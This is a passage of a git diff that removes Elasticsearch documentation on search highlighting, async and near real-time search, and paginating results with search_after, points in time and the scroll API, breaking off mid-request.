-[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match": { "user.id": "kimchy" } - }, - "highlight": { - "fields": { - "comment": { "type": "plain" } - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -[[configure-tags]] -[discrete] -== Configure highlighting tags - -By default, the highlighting will wrap highlighted text in `` and -``. This can be controlled by setting `pre_tags` and `post_tags`, -for example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query" : { - "match": { "user.id": "kimchy" } - }, - "highlight" : { - "pre_tags" : [""], - "post_tags" : [""], - "fields" : { - "body" : {} - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -When using the fast vector highlighter, you can specify additional tags and the -"importance" is ordered. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query" : { - "match": { "user.id": "kimchy" } - }, - "highlight" : { - "pre_tags" : ["", ""], - "post_tags" : ["", ""], - "fields" : { - "body" : {} - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -You can also use the built-in `styled` tag schema: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query" : { - "match": { "user.id": "kimchy" } - }, - "highlight" : { - "tags_schema" : "styled", - "fields" : { - "comment" : {} - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -[discrete] -[[highlight-source]] -== Highlight on source - -Forces the highlighting to highlight fields based on the source even if fields -are stored separately. Defaults to `false`. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query" : { - "match": { "user.id": "kimchy" } - }, - "highlight" : { - "fields" : { - "comment" : {"force_source" : true} - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - - -[[highlight-all]] -[discrete] -== Highlight in all fields - -By default, only fields that contains a query match are highlighted. Set -`require_field_match` to `false` to highlight all fields. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query" : { - "match": { "user.id": "kimchy" } - }, - "highlight" : { - "require_field_match": false, - "fields": { - "body" : { "pre_tags" : [""], "post_tags" : [""] } - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -[[matched-fields]] -[discrete] -== Combine matches on multiple fields - -WARNING: This is only supported by the `fvh` highlighter - -The Fast Vector Highlighter can combine matches on multiple fields to -highlight a single field. This is most intuitive for multifields that -analyze the same string in different ways. All `matched_fields` must have -`term_vector` set to `with_positions_offsets` but only the field to which -the matches are combined is loaded so only that field would benefit from having -`store` set to `yes`. - -In the following examples, `comment` is analyzed by the `english` -analyzer and `comment.plain` is analyzed by the `standard` analyzer. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "query_string": { - "query": "comment.plain:running scissors", - "fields": [ "comment" ] - } - }, - "highlight": { - "order": "score", - "fields": { - "comment": { - "matched_fields": [ "comment", "comment.plain" ], - "type": "fvh" - } - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -The above matches both "run with scissors" and "running with scissors" -and would highlight "running" and "scissors" but not "run". If both -phrases appear in a large document then "running with scissors" is -sorted above "run with scissors" in the fragments list because there -are more matches in that fragment. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "query_string": { - "query": "running scissors", - "fields": ["comment", "comment.plain^10"] - } - }, - "highlight": { - "order": "score", - "fields": { - "comment": { - "matched_fields": ["comment", "comment.plain"], - "type" : "fvh" - } - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -The above highlights "run" as well as "running" and "scissors" but -still sorts "running with scissors" above "run with scissors" because -the plain match ("running") is boosted. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "query_string": { - "query": "running scissors", - "fields": [ "comment", "comment.plain^10" ] - } - }, - "highlight": { - "order": "score", - "fields": { - "comment": { - "matched_fields": [ "comment.plain" ], - "type": "fvh" - } - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -The above query wouldn't highlight "run" or "scissor" but shows that -it is just fine not to list the field to which the matches are combined -(`comment`) in the matched fields. - -[NOTE] -Technically it is also fine to add fields to `matched_fields` that -don't share the same underlying string as the field to which the matches -are combined. The results might not make much sense and if one of the -matches is off the end of the text then the whole query will fail. - -[NOTE] -=================================================================== -There is a small amount of overhead involved with setting -`matched_fields` to a non-empty array so always prefer -[source,js] --------------------------------------------------- - "highlight": { - "fields": { - "comment": {} - } - } --------------------------------------------------- -// NOTCONSOLE -to -[source,js] --------------------------------------------------- - "highlight": { - "fields": { - "comment": { - "matched_fields": ["comment"], - "type" : "fvh" - } - } - } --------------------------------------------------- -// NOTCONSOLE -=================================================================== - - -[[explicit-field-order]] -[discrete] -== Explicitly order highlighted fields -Elasticsearch highlights the fields in the order that they are sent, but per the -JSON spec, objects are unordered. If you need to be explicit about the order -in which fields are highlighted specify the `fields` as an array: - -[source,console] --------------------------------------------------- -GET /_search -{ - "highlight": { - "fields": [ - { "title": {} }, - { "text": {} } - ] - } -} --------------------------------------------------- -// TEST[setup:my_index] - -None of the highlighters built into Elasticsearch care about the order that the -fields are highlighted but a plugin might. - - - - -[discrete] -[[control-highlighted-frags]] -== Control highlighted fragments - -Each field highlighted can control the size of the highlighted fragment -in characters (defaults to `100`), and the maximum number of fragments -to return (defaults to `5`). -For example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query" : { - "match": { "user.id": "kimchy" } - }, - "highlight" : { - "fields" : { - "comment" : {"fragment_size" : 150, "number_of_fragments" : 3} - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -On top of this it is possible to specify that highlighted fragments need -to be sorted by score: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query" : { - "match": { "user.id": "kimchy" } - }, - "highlight" : { - "order" : "score", - "fields" : { - "comment" : {"fragment_size" : 150, "number_of_fragments" : 3} - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -If the `number_of_fragments` value is set to `0` then no fragments are -produced, instead the whole content of the field is returned, and of -course it is highlighted. This can be very handy if short texts (like -document title or address) need to be highlighted but no fragmentation -is required. Note that `fragment_size` is ignored in this case. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query" : { - "match": { "user.id": "kimchy" } - }, - "highlight" : { - "fields" : { - "body" : {}, - "blog.title" : {"number_of_fragments" : 0} - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -When using `fvh` one can use `fragment_offset` -parameter to control the margin to start highlighting from. - -In the case where there is no matching fragment to highlight, the default is -to not return anything. Instead, we can return a snippet of text from the -beginning of the field by setting `no_match_size` (default `0`) to the length -of the text that you want returned. The actual length may be shorter or longer than -specified as it tries to break on a word boundary. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match": { "user.id": "kimchy" } - }, - "highlight": { - "fields": { - "comment": { - "fragment_size": 150, - "number_of_fragments": 3, - "no_match_size": 150 - } - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -[discrete] -[[highlight-postings-list]] -== Highlight using the postings list - -Here is an example of setting the `comment` field in the index mapping to -allow for highlighting using the postings: - -[source,console] --------------------------------------------------- -PUT /example -{ - "mappings": { - "properties": { - "comment" : { - "type": "text", - "index_options" : "offsets" - } - } - } -} --------------------------------------------------- - -Here is an example of setting the `comment` field to allow for -highlighting using the `term_vectors` (this will cause the index to be bigger): - -[source,console] --------------------------------------------------- -PUT /example -{ - "mappings": { - "properties": { - "comment" : { - "type": "text", - "term_vector" : "with_positions_offsets" - } - } - } -} --------------------------------------------------- - -[discrete] -[[specify-fragmenter]] -== Specify a fragmenter for the plain highlighter - -When using the `plain` highlighter, you can choose between the `simple` and -`span` fragmenters: - -[source,console] --------------------------------------------------- -GET my-index-000001/_search -{ - "query": { - "match_phrase": { "message": "number 1" } - }, - "highlight": { - "fields": { - "message": { - "type": "plain", - "fragment_size": 15, - "number_of_fragments": 3, - "fragmenter": "simple" - } - } - } -} --------------------------------------------------- -// TEST[setup:messages] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "max_score": 1.6011951, - "hits": [ - { - "_index": "my-index-000001", - "_type": "_doc", - "_id": "1", - "_score": 1.6011951, - "_source": { - "message": "some message with the number 1" - }, - "highlight": { - "message": [ - " with the number", - " 1" - ] - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,/] - -[source,console] --------------------------------------------------- -GET my-index-000001/_search -{ - "query": { - "match_phrase": { "message": "number 1" } - }, - "highlight": { - "fields": { - "message": { - "type": "plain", - "fragment_size": 15, - "number_of_fragments": 3, - "fragmenter": "span" - } - } - } -} --------------------------------------------------- -// TEST[setup:messages] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "max_score": 1.6011951, - "hits": [ - { - "_index": "my-index-000001", - "_type": "_doc", - "_id": "1", - "_score": 1.6011951, - "_source": { - "message": "some message with the number 1" - }, - "highlight": { - "message": [ - " with the number 1" - ] - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,/] - -If the `number_of_fragments` option is set to `0`, -`NullFragmenter` is used which does not fragment the text at all. -This is useful for highlighting the entire contents of a document or field. - - -[discrete] -[[how-es-highlighters-work-internally]] -== How highlighters work internally - -Given a query and a text (the content of a document field), the goal of a -highlighter is to find the best text fragments for the query, and highlight -the query terms in the found fragments. For this, a highlighter needs to -address several questions: - -- How break a text into fragments? -- How to find the best fragments among all fragments? -- How to highlight the query terms in a fragment? - -[discrete] -=== How to break a text into fragments? -Relevant settings: `fragment_size`, `fragmenter`, `type` of highlighter, -`boundary_chars`, `boundary_max_scan`, `boundary_scanner`, `boundary_scanner_locale`. - -Plain highlighter begins with analyzing the text using the given analyzer, -and creating a token stream from it. Plain highlighter uses a very simple -algorithm to break the token stream into fragments. It loops through terms in the token stream, -and every time the current term's end_offset exceeds `fragment_size` multiplied by the number of -created fragments, a new fragment is created. A little more computation is done with using `span` -fragmenter to avoid breaking up text between highlighted terms. But overall, since the breaking is -done only by `fragment_size`, some fragments can be quite odd, e.g. beginning -with a punctuation mark. - -Unified or FVH highlighters do a better job of breaking up a text into -fragments by utilizing Java's `BreakIterator`. This ensures that a fragment -is a valid sentence as long as `fragment_size` allows for this. - -[discrete] -=== How to find the best fragments? -Relevant settings: `number_of_fragments`. - -To find the best, most relevant, fragments, a highlighter needs to score -each fragment in respect to the given query. The goal is to score only those -terms that participated in generating the 'hit' on the document. -For some complex queries, this is still work in progress. - -The plain highlighter creates an in-memory index from the current token stream, -and re-runs the original query criteria through Lucene's query execution planner -to get access to low-level match information for the current text. -For more complex queries the original query could be converted to a span query, -as span queries can handle phrases more accurately. Then this obtained low-level match -information is used to score each individual fragment. The scoring method of the plain -highlighter is quite simple. Each fragment is scored by the number of unique -query terms found in this fragment. The score of individual term is equal to its boost, -which is by default is 1. Thus, by default, a fragment that contains one unique query term, -will get a score of 1; and a fragment that contains two unique query terms, -will get a score of 2 and so on. The fragments are then sorted by their scores, -so the highest scored fragments will be output first. - -FVH doesn't need to analyze the text and build an in-memory index, as it uses -pre-indexed document term vectors, and finds among them terms that correspond to the query. -FVH scores each fragment by the number of query terms found in this fragment. -Similarly to plain highlighter, score of individual term is equal to its boost value. -In contrast to plain highlighter, all query terms are counted, not only unique terms. - -Unified highlighter can use pre-indexed term vectors or pre-indexed terms offsets, -if they are available. Otherwise, similar to Plain Highlighter, it has to create -an in-memory index from the text. Unified highlighter uses the BM25 scoring model -to score fragments. - -[discrete] -=== How to highlight the query terms in a fragment? -Relevant settings: `pre-tags`, `post-tags`. - -The goal is to highlight only those terms that participated in generating the 'hit' on the document. -For some complex boolean queries, this is still work in progress, as highlighters don't reflect -the boolean logic of a query and only extract leaf (terms, phrases, prefix etc) queries. - -Plain highlighter given the token stream and the original text, recomposes the original text to -highlight only terms from the token stream that are contained in the low-level match information -structure from the previous step. - -FVH and unified highlighter use intermediate data structures to represent -fragments in some raw form, and then populate them with actual text. - -A highlighter uses `pre-tags`, `post-tags` to encode highlighted terms. - -[discrete] -=== An example of the work of the unified highlighter - -Let's look in more details how unified highlighter works. - -First, we create a index with a text field `content`, that will be indexed -using `english` analyzer, and will be indexed without offsets or term vectors. - -[source,js] --------------------------------------------------- -PUT test_index -{ - "mappings": { - "properties": { - "content": { - "type": "text", - "analyzer": "english" - } - } - } -} --------------------------------------------------- -// NOTCONSOLE - -We put the following document into the index: - -[source,js] --------------------------------------------------- -PUT test_index/_doc/doc1 -{ - "content" : "For you I'm only a fox like a hundred thousand other foxes. But if you tame me, we'll need each other. You'll be the only boy in the world for me. I'll be the only fox in the world for you." -} --------------------------------------------------- -// NOTCONSOLE - - -And we ran the following query with a highlight request: - -[source,js] --------------------------------------------------- -GET test_index/_search -{ - "query": { - "match_phrase" : {"content" : "only fox"} - }, - "highlight": { - "type" : "unified", - "number_of_fragments" : 3, - "fields": { - "content": {} - } - } -} --------------------------------------------------- -// NOTCONSOLE - - -After `doc1` is found as a hit for this query, this hit will be passed to the -unified highlighter for highlighting the field `content` of the document. -Since the field `content` was not indexed either with offsets or term vectors, -its raw field value will be analyzed, and in-memory index will be built from -the terms that match the query: - - {"token":"onli","start_offset":12,"end_offset":16,"position":3}, - {"token":"fox","start_offset":19,"end_offset":22,"position":5}, - {"token":"fox","start_offset":53,"end_offset":58,"position":11}, - {"token":"onli","start_offset":117,"end_offset":121,"position":24}, - {"token":"onli","start_offset":159,"end_offset":163,"position":34}, - {"token":"fox","start_offset":164,"end_offset":167,"position":35} - -Our complex phrase query will be converted to the span query: -`spanNear([text:onli, text:fox], 0, true)`, meaning that we are looking for -terms "onli: and "fox" within 0 distance from each other, and in the given -order. The span query will be run against the created before in-memory index, -to find the following match: - - {"term":"onli", "start_offset":159, "end_offset":163}, - {"term":"fox", "start_offset":164, "end_offset":167} - -In our example, we have got a single match, but there could be several matches. -Given the matches, the unified highlighter breaks the text of the field into -so called "passages". Each passage must contain at least one match. -The unified highlighter with the use of Java's `BreakIterator` ensures that each -passage represents a full sentence as long as it doesn't exceed `fragment_size`. -For our example, we have got a single passage with the following properties -(showing only a subset of the properties here): - - Passage: - startOffset: 147 - endOffset: 189 - score: 3.7158387 - matchStarts: [159, 164] - matchEnds: [163, 167] - numMatches: 2 - -Notice how a passage has a score, calculated using the BM25 scoring formula -adapted for passages. Scores allow us to choose the best scoring -passages if there are more passages available than the requested -by the user `number_of_fragments`. Scores also let us to sort passages by -`order: "score"` if requested by the user. - -As the final step, the unified highlighter will extract from the field's text -a string corresponding to each passage: - - "I'll be the only fox in the world for you." - -and will format with the tags and all matches in this string -using the passages's `matchStarts` and `matchEnds` information: - - I'll be the only fox in the world for you. - -This kind of formatted strings are the final result of the highlighter returned -to the user. \ No newline at end of file diff --git a/docs/reference/search/search-your-data/long-running-searches.asciidoc b/docs/reference/search/search-your-data/long-running-searches.asciidoc deleted file mode 100644 index d51e017b0f9..00000000000 --- a/docs/reference/search/search-your-data/long-running-searches.asciidoc +++ /dev/null @@ -1,22 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[async-search-intro]] -== Long-running searches - -{es} generally allows you to quickly search across big amounts of data. There are -situations where a search executes on many many shards, possibly against -<> and spanning multiple -<>, for which -results are not expected to be returned in milliseconds. When you need to -execute long-running searches, synchronously -waiting for its results to be returned is not ideal. Instead, Async search lets -you submit a search request that gets executed _asynchronously_, -monitor the progress of the request, and retrieve results at a later stage. -You can also retrieve partial results as they become available but -before the search has completed. - -You can submit an async search request using the <> API. The <> API allows you to -monitor the progress of an async search request and retrieve its results. An -ongoing async search can be deleted through the <> API. diff --git a/docs/reference/search/search-your-data/near-real-time.asciidoc b/docs/reference/search/search-your-data/near-real-time.asciidoc deleted file mode 100644 index fe24a593cff..00000000000 --- a/docs/reference/search/search-your-data/near-real-time.asciidoc +++ /dev/null @@ -1,25 +0,0 @@ -[[near-real-time]] -== Near real-time search -The overview of <> indicates that when a document is stored in {es}, it is indexed and fully searchable in _near real-time_--within 1 second. What defines near real-time search? - -Lucene, the Java libraries on which {es} is based, introduced the concept of per-segment search. A _segment_ is similar to an inverted index, but the word _index_ in Lucene means "a collection of segments plus a commit point". After a commit, a new segment is added to the commit point and the buffer is cleared. - -Sitting between {es} and the disk is the filesystem cache. Documents in the in-memory indexing buffer (<>) are written to a new segment (<>). The new segment is written to the filesystem cache first (which is cheap) and only later is it flushed to disk (which is expensive). However, after a file is in the cache, it can be opened and read just like any other file. - -[[img-pre-refresh]] -.A Lucene index with new documents in the in-memory buffer -image::images/lucene-in-memory-buffer.png["A Lucene index with new documents in the in-memory buffer"] - -Lucene allows new segments to be written and opened, making the documents they contain visible to search ​without performing a full commit. This is a much lighter process than a commit to disk, and can be done frequently without degrading performance. - -[[img-post-refresh]] -.The buffer contents are written to a segment, which is searchable, but is not yet committed -image::images/lucene-written-not-committed.png["The buffer contents are written to a segment, which is searchable, but is not yet committed"] - -In {es}, this process of writing and opening a new segment is called a _refresh_. A refresh makes all operations performed on an index since the last refresh available for search. You can control refreshes through the following means: - -* Waiting for the refresh interval -* Setting the <> option -* Using the <> to explicitly complete a refresh (`POST _refresh`) - -By default, {es} periodically refreshes indices every second, but only on indices that have received one search request or more in the last 30 seconds. This is why we say that {es} has _near_ real-time search: document changes are not visible to search immediately, but will become visible within this timeframe. diff --git a/docs/reference/search/search-your-data/paginate-search-results.asciidoc b/docs/reference/search/search-your-data/paginate-search-results.asciidoc deleted file mode 100644 index f036d04fb00..00000000000 --- a/docs/reference/search/search-your-data/paginate-search-results.asciidoc +++ /dev/null @@ -1,483 +0,0 @@ -[[paginate-search-results]] -== Paginate search results - -By default, searches return the top 10 matching hits. To page through a larger -set of results, you can use the <>'s `from` and `size` -parameters. The `from` parameter defines the number of hits to skip, defaulting -to `0`. The `size` parameter is the maximum number of hits to return. Together, -these two parameters define a page of results. - -[source,console] ----- -GET /_search -{ - "from": 5, - "size": 20, - "query": { - "match": { - "user.id": "kimchy" - } - } -} ----- - -Avoid using `from` and `size` to page too deeply or request too many results at -once. Search requests usually span multiple shards. Each shard must load its -requested hits and the hits for any previous pages into memory. For deep pages -or large sets of results, these operations can significantly increase memory and -CPU usage, resulting in degraded performance or node failures. - -By default, you cannot use `from` and `size` to page through more than 10,000 -hits. This limit is a safeguard set by the -<> index setting. If you need -to page through more than 10,000 hits, use the <> -parameter instead. - -WARNING: {es} uses Lucene's internal doc IDs as tie-breakers. These internal doc -IDs can be completely different across replicas of the same data. When paging -search hits, you might occasionally see that documents with the same sort values -are not ordered consistently. - -[discrete] -[[search-after]] -=== Search after - -You can use the `search_after` parameter to retrieve the next page of hits -using a set of <> from the previous page. - -Using `search_after` requires multiple search requests with the same `query` and -`sort` values. If a <> occurs between these requests, -the order of your results may change, causing inconsistent results across pages. To -prevent this, you can create a <> to -preserve the current index state over your searches. - -[source,console] ----- -POST /my-index-000001/_pit?keep_alive=1m ----- -// TEST[setup:my_index] - -The API returns a PIT ID. - -[source,console-result] ----- -{ - "id": "46ToAwMDaWR4BXV1aWQxAgZub2RlXzEAAAAAAAAAAAEBYQNpZHkFdXVpZDIrBm5vZGVfMwAAAAAAAAAAKgFjA2lkeQV1dWlkMioGbm9kZV8yAAAAAAAAAAAMAWICBXV1aWQyAAAFdXVpZDEAAQltYXRjaF9hbGw_gAAAAA==" -} ----- -// TESTRESPONSE[s/"id": "46ToAwMDaWR4BXV1aWQxAgZub2RlXzEAAAAAAAAAAAEBYQNpZHkFdXVpZDIrBm5vZGVfMwAAAAAAAAAAKgFjA2lkeQV1dWlkMioGbm9kZV8yAAAAAAAAAAAMAWICBXV1aWQyAAAFdXVpZDEAAQltYXRjaF9hbGw_gAAAAA=="/"id": $body.id/] - -To get the first page of results, submit a search request with a `sort` -argument. If using a PIT, specify the PIT ID in the `pit.id` parameter and omit -the target data stream or index from the request path. - -IMPORTANT: We recommend you include a tiebreaker field in your `sort`. This -tiebreaker field should contain a unique value for each document. If you don't -include a tiebreaker field, your paged results could miss or duplicate hits. - -[source,console] ----- -GET /_search -{ - "size": 10000, - "query": { - "match" : { - "user.id" : "elkbee" - } - }, - "pit": { - "id": "46ToAwMDaWR4BXV1aWQxAgZub2RlXzEAAAAAAAAAAAEBYQNpZHkFdXVpZDIrBm5vZGVfMwAAAAAAAAAAKgFjA2lkeQV1dWlkMioGbm9kZV8yAAAAAAAAAAAMAWICBXV1aWQyAAAFdXVpZDEAAQltYXRjaF9hbGw_gAAAAA==", <1> - "keep_alive": "1m" - }, - "sort": [ <2> - {"@timestamp": "asc"}, - {"tie_breaker_id": "asc"} - ] -} ----- -// TEST[catch:missing] - -<1> PIT ID for the search. -<2> Sorts hits for the search. - -The search response includes an array of `sort` values for each hit. If you used -a PIT, the response's `pit_id` parameter contains an updated PIT ID. - -[source,console-result] ----- -{ - "pit_id" : "46ToAwEPbXktaW5kZXgtMDAwMDAxFnVzaTVuenpUVGQ2TFNheUxVUG5LVVEAFldicVdzOFFtVHZTZDFoWWowTGkwS0EAAAAAAAAAAAQURzZzcUszUUJ5U1NMX3Jyak5ET0wBFnVzaTVuenpUVGQ2TFNheUxVUG5LVVEAAA==", <1> - "took" : 17, - "timed_out" : false, - "_shards" : ..., - "hits" : { - "total" : ..., - "max_score" : null, - "hits" : [ - ... - { - "_index" : "my-index-000001", - "_id" : "FaslK3QBySSL_rrj9zM5", - "_score" : null, - "_source" : ..., - "sort" : [ <2> - 4098435132000, - "FaslK3QBySSL_rrj9zM5" - ] - } - ] - } -} ----- -// TESTRESPONSE[skip: unable to access PIT ID] - -<1> Updated `id` for the point in time. -<2> Sort values for the last returned hit. - -To get the next page of results, rerun the previous search using the last hit's -sort values as the `search_after` argument. If using a PIT, use the latest PIT -ID in the `pit.id` parameter. The search's `query` and `sort` arguments must -remain unchanged. If provided, the `from` argument must be `0` (default) or `-1`. - -[source,console] ----- -GET /_search -{ - "size": 10000, - "query": { - "match" : { - "user.id" : "elkbee" - } - }, - "pit": { - "id": "46ToAwEPbXktaW5kZXgtMDAwMDAxFnVzaTVuenpUVGQ2TFNheUxVUG5LVVEAFldicVdzOFFtVHZTZDFoWWowTGkwS0EAAAAAAAAAAAQURzZzcUszUUJ5U1NMX3Jyak5ET0wBFnVzaTVuenpUVGQ2TFNheUxVUG5LVVEAAA==", <1> - "keep_alive": "1m" - }, - "sort": [ - {"@timestamp": "asc"}, - {"tie_breaker_id": "asc"} - ], - "search_after": [ <2> - 4098435132000, - "FaslK3QBySSL_rrj9zM5" - ] -} ----- -// TEST[catch:missing] - -<1> PIT ID returned by the previous search. -<2> Sort values from the previous search's last hit. - -You can repeat this process to get additional pages of results. If using a PIT, -you can extend the PIT's retention period using the -`keep_alive` parameter of each search request. - -When you're finished, you should delete your PIT. - -[source,console] ----- -DELETE /_pit -{ - "id" : "46ToAwEPbXktaW5kZXgtMDAwMDAxFnVzaTVuenpUVGQ2TFNheUxVUG5LVVEAFldicVdzOFFtVHZTZDFoWWowTGkwS0EAAAAAAAAAAAQURzZzcUszUUJ5U1NMX3Jyak5ET0wBFnVzaTVuenpUVGQ2TFNheUxVUG5LVVEAAA==" -} ----- -// TEST[catch:missing] - - -[discrete] -[[scroll-search-results]] -=== Scroll search results - -IMPORTANT: We no longer recommend using the scroll API for deep pagination. If -you need to preserve the index state while paging through more than 10,000 hits, -use the <> parameter with a point in time (PIT). - -While a `search` request returns a single ``page'' of results, the `scroll` -API can be used to retrieve large numbers of results (or even all results) -from a single search request, in much the same way as you would use a cursor -on a traditional database. - -Scrolling is not intended for real time user requests, but rather for -processing large amounts of data, e.g. in order to reindex the contents of one -data stream or index into a new data stream or index with a different -configuration. - -.Client support for scrolling and reindexing -********************************************* - -Some of the officially supported clients provide helpers to assist with -scrolled searches and reindexing: - -Perl:: - - See https://metacpan.org/pod/Search::Elasticsearch::Client::5_0::Bulk[Search::Elasticsearch::Client::5_0::Bulk] - and https://metacpan.org/pod/Search::Elasticsearch::Client::5_0::Scroll[Search::Elasticsearch::Client::5_0::Scroll] - -Python:: - - See https://elasticsearch-py.readthedocs.org/en/master/helpers.html[elasticsearch.helpers.*] - -JavaScript:: - - See {jsclient-current}/client-helpers.html[client.helpers.*] - -********************************************* - -NOTE: The results that are returned from a scroll request reflect the state of -the data stream or index at the time that the initial `search` request was made, like a -snapshot in time. Subsequent changes to documents (index, update or delete) -will only affect later search requests. - -In order to use scrolling, the initial search request should specify the -`scroll` parameter in the query string, which tells Elasticsearch how long it -should keep the ``search context'' alive (see <>), eg `?scroll=1m`. - -[source,console] --------------------------------------------------- -POST /my-index-000001/_search?scroll=1m -{ - "size": 100, - "query": { - "match": { - "message": "foo" - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -The result from the above request includes a `_scroll_id`, which should -be passed to the `scroll` API in order to retrieve the next batch of -results. - -[source,console] --------------------------------------------------- -POST /_search/scroll <1> -{ - "scroll" : "1m", <2> - "scroll_id" : "DXF1ZXJ5QW5kRmV0Y2gBAAAAAAAAAD4WYm9laVYtZndUQlNsdDcwakFMNjU1QQ==" <3> -} --------------------------------------------------- -// TEST[continued s/DXF1ZXJ5QW5kRmV0Y2gBAAAAAAAAAD4WYm9laVYtZndUQlNsdDcwakFMNjU1QQ==/$body._scroll_id/] - -<1> `GET` or `POST` can be used and the URL should not include the `index` - name -- this is specified in the original `search` request instead. -<2> The `scroll` parameter tells Elasticsearch to keep the search context open - for another `1m`. -<3> The `scroll_id` parameter - -The `size` parameter allows you to configure the maximum number of hits to be -returned with each batch of results. Each call to the `scroll` API returns the -next batch of results until there are no more results left to return, ie the -`hits` array is empty. - -IMPORTANT: The initial search request and each subsequent scroll request each -return a `_scroll_id`. While the `_scroll_id` may change between requests, it doesn’t -always change — in any case, only the most recently received `_scroll_id` should be used. - -NOTE: If the request specifies aggregations, only the initial search response -will contain the aggregations results. - -NOTE: Scroll requests have optimizations that make them faster when the sort -order is `_doc`. If you want to iterate over all documents regardless of the -order, this is the most efficient option: - -[source,console] --------------------------------------------------- -GET /_search?scroll=1m -{ - "sort": [ - "_doc" - ] -} --------------------------------------------------- -// TEST[setup:my_index] - -[discrete] -[[scroll-search-context]] -==== Keeping the search context alive - -A scroll returns all the documents which matched the search at the time of the -initial search request. It ignores any subsequent changes to these documents. -The `scroll_id` identifies a _search context_ which keeps track of everything -that {es} needs to return the correct documents. The search context is created -by the initial request and kept alive by subsequent requests. - -The `scroll` parameter (passed to the `search` request and to every `scroll` -request) tells Elasticsearch how long it should keep the search context alive. -Its value (e.g. `1m`, see <>) does not need to be long enough to -process all data -- it just needs to be long enough to process the previous -batch of results. Each `scroll` request (with the `scroll` parameter) sets a -new expiry time. If a `scroll` request doesn't pass in the `scroll` -parameter, then the search context will be freed as part of _that_ `scroll` -request. - -Normally, the background merge process optimizes the index by merging together -smaller segments to create new, bigger segments. Once the smaller segments are -no longer needed they are deleted. This process continues during scrolling, but -an open search context prevents the old segments from being deleted since they -are still in use. - -TIP: Keeping older segments alive means that more disk space and file handles -are needed. Ensure that you have configured your nodes to have ample free file -handles. See <>. - -Additionally, if a segment contains deleted or updated documents then the -search context must keep track of whether each document in the segment was live -at the time of the initial search request. Ensure that your nodes have -sufficient heap space if you have many open scrolls on an index that is subject -to ongoing deletes or updates. - -NOTE: To prevent against issues caused by having too many scrolls open, the -user is not allowed to open scrolls past a certain limit. By default, the -maximum number of open scrolls is 500. This limit can be updated with the -`search.max_open_scroll_context` cluster setting. - -You can check how many search contexts are open with the -<>: - -[source,console] ---------------------------------------- -GET /_nodes/stats/indices/search ---------------------------------------- - -[discrete] -[[clear-scroll]] -==== Clear scroll - -Search context are automatically removed when the `scroll` timeout has been -exceeded. However keeping scrolls open has a cost, as discussed in the -<> so scrolls should be explicitly -cleared as soon as the scroll is not being used anymore using the -`clear-scroll` API: - -[source,console] ---------------------------------------- -DELETE /_search/scroll -{ - "scroll_id" : "DXF1ZXJ5QW5kRmV0Y2gBAAAAAAAAAD4WYm9laVYtZndUQlNsdDcwakFMNjU1QQ==" -} ---------------------------------------- -// TEST[catch:missing] - -Multiple scroll IDs can be passed as array: - -[source,console] ---------------------------------------- -DELETE /_search/scroll -{ - "scroll_id" : [ - "DXF1ZXJ5QW5kRmV0Y2gBAAAAAAAAAD4WYm9laVYtZndUQlNsdDcwakFMNjU1QQ==", - "DnF1ZXJ5VGhlbkZldGNoBQAAAAAAAAABFmtSWWRRWUJrU2o2ZExpSGJCVmQxYUEAAAAAAAAAAxZrUllkUVlCa1NqNmRMaUhiQlZkMWFBAAAAAAAAAAIWa1JZZFFZQmtTajZkTGlIYkJWZDFhQQAAAAAAAAAFFmtSWWRRWUJrU2o2ZExpSGJCVmQxYUEAAAAAAAAABBZrUllkUVlCa1NqNmRMaUhiQlZkMWFB" - ] -} ---------------------------------------- -// TEST[catch:missing] - -All search contexts can be cleared with the `_all` parameter: - -[source,console] ---------------------------------------- -DELETE /_search/scroll/_all ---------------------------------------- - -The `scroll_id` can also be passed as a query string parameter or in the request body. -Multiple scroll IDs can be passed as comma separated values: - -[source,console] ---------------------------------------- -DELETE /_search/scroll/DXF1ZXJ5QW5kRmV0Y2gBAAAAAAAAAD4WYm9laVYtZndUQlNsdDcwakFMNjU1QQ==,DnF1ZXJ5VGhlbkZldGNoBQAAAAAAAAABFmtSWWRRWUJrU2o2ZExpSGJCVmQxYUEAAAAAAAAAAxZrUllkUVlCa1NqNmRMaUhiQlZkMWFBAAAAAAAAAAIWa1JZZFFZQmtTajZkTGlIYkJWZDFhQQAAAAAAAAAFFmtSWWRRWUJrU2o2ZExpSGJCVmQxYUEAAAAAAAAABBZrUllkUVlCa1NqNmRMaUhiQlZkMWFB ---------------------------------------- -// TEST[catch:missing] - -[discrete] -[[slice-scroll]] -==== Sliced scroll - -For scroll queries that return a lot of documents it is possible to split the scroll in multiple slices which -can be consumed independently: - -[source,console] --------------------------------------------------- -GET 